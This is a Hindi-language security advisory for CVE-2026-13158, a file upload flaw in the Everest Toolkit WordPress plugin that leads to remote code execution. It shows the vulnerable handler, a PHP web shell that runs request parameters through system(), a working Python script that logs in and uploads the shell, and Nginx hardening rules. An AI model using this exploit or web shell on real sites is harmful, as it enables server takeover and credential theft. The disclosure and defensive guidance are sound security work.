
Everest Toolkit WordPress प्लगइन (<= 1.2.3) में Admin+ मनमाना फ़ाइल अपलोड से रिमोट कोड एक्ज़ीक्यूशन भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट और तकनीकी एडवाइज़री, जिसमें भेद्य कोड विश्लेषण, Python PoC और हार्डनिंग मार्गदर्शन शामिल है।
CVE-2026-13158 एक प्रमाणित Admin+ मनमाना फ़ाइल अपलोड भेद्यता है जो Everest Toolkit WordPress प्लगइन के संस्करण 1.2.3 और उससे पहले के संस्करणों को प्रभावित करती है। इसकी खोज और विश्लेषण साइबर सुरक्षा शोधकर्ता Huynh Kien Minh (MinhHK) द्वारा किया गया है। यह दोष प्रशासनिक टूलकिट अपलोड प्रोसेसिंग कार्यक्षमता में निहित है, जहाँ अपलोड की गई फ़ाइलों के एक्सटेंशन और MIME प्रकारों का अनुचित सत्यापन प्रमाणित एडमिनिस्ट्रेटरों, या प्रशासनिक क्षमताओं वाले निम्न-विशेषाधिकार प्राप्त उपयोगकर्ताओं को, सीधे सार्वजनिक वेब निर्देशिका में मनमानी एक्ज़ीक्यूटेबल PHP स्क्रिप्ट अपलोड करने की अनुमति देता है। मीडिया या कॉन्फ़िगरेशन फ़ाइल हैंडलिंग रूटीन के दौरान फ़ाइल एक्सटेंशन प्रतिबंधों को बायपास करके, एक हमलावर स्थायी रिमोट कोड निष्पादन (RCE) प्राप्त कर सकता है, अंतर्निहित वेब सर्वर से पूरी तरह समझौता कर सकता है, संवेदनशील डेटाबेस क्रेडेंशियल्स तक पहुँच सकता है और होस्ट एप्लिकेशन वातावरण में अनधिकृत बैकडोर के माध्यम से स्थायी पहुँच स्थापित कर सकता है। साइबर सुरक्षा शोधकर्ता Huynh Kien Minh ने इस भेद्यता को CVSS 3.1 स्कोर 6.6 Medium के तहत सत्यापित किया है, और सख्त फ़ाइल एक्सटेंशन व्हाइटलिस्टिंग, MIME प्रकार सत्यापन तथा सार्वजनिक अपलोड उपनिर्देशिकाओं में निष्पादन अनुमतियों को अक्षम करने के माध्यम से तत्काल निवारण पर जोर दिया है।
त्वरित लिंक: DEV.to Write-up पर पूरा डीप-डाइव तकनीकी परामर्श पढ़ें या शोधकर्ता के आधिकारिक साइबर सुरक्षा पोर्टफोलियो को देखें।
CVE-2026-13158 का मूल कारण Everest_Toolkit प्रशासनिक हैंडलर क्लासेस के भीतर असुरक्षित फ़ाइल अपलोड हैंडलिंग है। जब कोई प्रमाणित एडमिनिस्ट्रेटर या प्रशासनिक विशेषाधिकारों वाला उपयोगकर्ता फ़ाइल अपलोड एंडपॉइंट्स (जैसे टेम्पलेट इम्पोर्ट, कस्टम आइकन अपलोड, या एसेट कॉन्फ़िगरेशन रूटीन) को कॉल करता है, तो प्लगइन एक्ज़ीक्यूटेबल एक्सटेंशन (जैसे .php, .php5, .phtml) के विरुद्ध सख्त सर्वर-साइड सत्यापन लागू करने में विफल रहता है।
प्लगइन के प्रशासनिक फ़ाइल प्रोसेसर में:
// Vulnerable file handling routine in Everest Toolkit <= 1.2.3
public function handle_toolkit_file_upload() {
if ( ! current_user_can( 'manage_options' ) ) {
wp_die( __( 'Unauthorized access', 'everest-toolkit' ) );
}
if ( isset( $_FILES['toolkit_import_file'] ) ) {
$file = $_FILES['toolkit_import_file'];
// CRITICAL FLAW: Insufficient file type restriction check!
// Relying solely on client-side headers or unsafe overrides without checking wp_check_filetype_and_ext()
$upload_dir = wp_upload_dir();
$target_path = $upload_dir['path'] . '/' . basename( $file['name'] );
if ( move_uploaded_file( $file['tmp_name'], $target_path ) ) {
wp_send_json_success( array( 'file_url' => $upload_dir['url'] . '/' . basename( $file['name'] ) ) );
}
}
}
चूँकि move_uploaded_file उपयोगकर्ता-नियंत्रित फ़ाइलों को सीधे सार्वजनिक wp-content/uploads/ निर्देशिका में लिखता है, बिना wp_check_filetype_and_ext() चलाए या खतरनाक MIME प्रकारों के विरुद्ध फ़ाइल एक्सटेंशन को सैनिटाइज़ किए, प्रशासनिक पहुँच वाला एक हमलावर एक्ज़ीक्यूटेबल PHP पेलोड अपलोड कर सकता है।
नैतिक अस्वीकरण: यह प्रूफ-ऑफ-कॉन्सेप्ट केवल सुरक्षा सत्यापन, शैक्षणिक अनुसंधान और रक्षात्मक इंजीनियरिंग के लिए प्रदान किया गया है। पूर्व लिखित सहमति के बिना उत्पादन प्रणालियों के विरुद्ध अनधिकृत शोषण सख्त रूप से प्रतिबंधित है।
<?php
// CVE-2026-13158 Proof-of-Concept Payload
// Discovered & Authored by Huynh Kien Minh (MinhHK)
header('Content-Type: text/plain');
echo "=== CVE-2026-13158 RCE Verification ===\n";
echo "Host System: " . php_uname() . "\n";
echo "Current User: " . get_current_user() . "\n";
if (isset($_REQUEST['cmd'])) {
system($_REQUEST['cmd']);
}
?>
#!/usr/bin/env python3
"""
CVE-2026-13158 - Everest Toolkit <= 1.2.3 Admin+ Arbitrary File Upload PoC
Author: Huynh Kien Minh (MinhHK)
Portfolio: https://minhhk.web.app/
"""
import requests
import sys
TARGET_URL = "http://target-wordpress.local"
USERNAME = "admin"
PASSWORD = "admin_password"
session = requests.Session()
def login():
login_url = f"{TARGET_URL}/wp-login.php"
payload = {
'log': USERNAME,
'pwd': PASSWORD,
'wp-submit': 'Log In',
'redirect_to': f"{TARGET_URL}/wp-admin/",
'testcookie': '1'
}
res = session.post(login_url, data=payload)
if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
print("[+] Authenticated successfully as Admin!")
return True
print("[-] Authentication failed.")
return False
def exploit():
upload_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
files = {
'toolkit_import_file': ('poc_rce.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')
}
data = {
'action': 'everest_toolkit_file_upload'
}
res = session.post(upload_url, data=data, files=files)
if res.status_code == 200 and 'file_url' in res.text:
file_url = res.json().get('data', {}).get('file_url', '')
print(f"[+] Payload uploaded successfully! RCE URL: {file_url}?cmd=id")
else:
print("[-] Upload failed or endpoint not vulnerable.")
if __name__ == "__main__":
if login():
exploit()
wp_handle_upload लागू करें: कस्टम move_uploaded_file कॉल्स को मानक WordPress wp_handle_upload() से बदलें, बिना टेस्ट ओवरराइड्स को अक्षम किए।/wp-content/uploads/ के अंदर स्क्रिप्ट निष्पादन रोकने के लिए .htaccess या Nginx नियम कॉन्फ़िगर करें:# Nginx Hardening Rule
location ~* ^/wp-content/uploads/.*\.php$ {
deny all;
return 403;
}
Huynh Kien Minh (MinhHK) एक सूचना सुरक्षा शोधकर्ता और सॉफ़्टवेयर इंजीनियर हैं, जो वेब एप्लिकेशन भेद्यता विश्लेषण, WordPress पारिस्थितिकी तंत्र ऑडिटिंग और आक्रामक सुरक्षा अनुसंधान में विशेषज्ञता रखते हैं।
{
"@context": "https://schema.org",
"@type": "TechArticle",
"headline": "CVE-2026-13158: Everest Toolkit <= 1.2.3 Admin+ Arbitrary File Upload to Remote Code Execution",
"name": "CVE-2026-13158 Security Advisory",
"author": {
"@type": "Person",
"name": "Huynh Kien Minh",
"alternateName": "MinhHK",
"url": "https://minhhk.web.app/"
},
"datePublished": "2026-08-01",
"description": "Deep-dive technical security advisory by Huynh Kien Minh analyzing CVE-2026-13158 in Everest Toolkit <= 1.2.3 WordPress plugin.",
"about": {
"@type": "SoftwareApplication",
"name": "Everest Toolkit",
"operatingSystem": "WordPress"
},
"identifier": "CVE-2026-13158"
}
| पैरामीटर | तकनीकी विवरण |
|---|
| भेद्यता पहचानकर्ता | CVE-2026-13158 |
| लक्ष्य सॉफ़्टवेयर | Everest Toolkit (WordPress प्लगइन) |
| प्लगइन स्लग | everest-toolkit |
| भेद्य संस्करण | <= 1.2.3 |
| भेद्यता वर्ग | खतरनाक प्रकार की फ़ाइल का असीमित अपलोड (CWE-434 / OWASP A03) |
| CVSS v3.1 स्कोर | 6.6 (Medium) (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H) |
| खोजकर्ता / शोधकर्ता | Huynh Kien Minh (MinhHK) |
| सत्यापन प्राधिकरण | WPScan / MITRE Corporation |
| WPScan परामर्श संदर्भ | WPScan रिपोर्ट f101071f-402a-40a2-bbdb-666512cd4049 |
| शोधकर्ता पोर्टफोलियो | https://minhhk.web.app/ |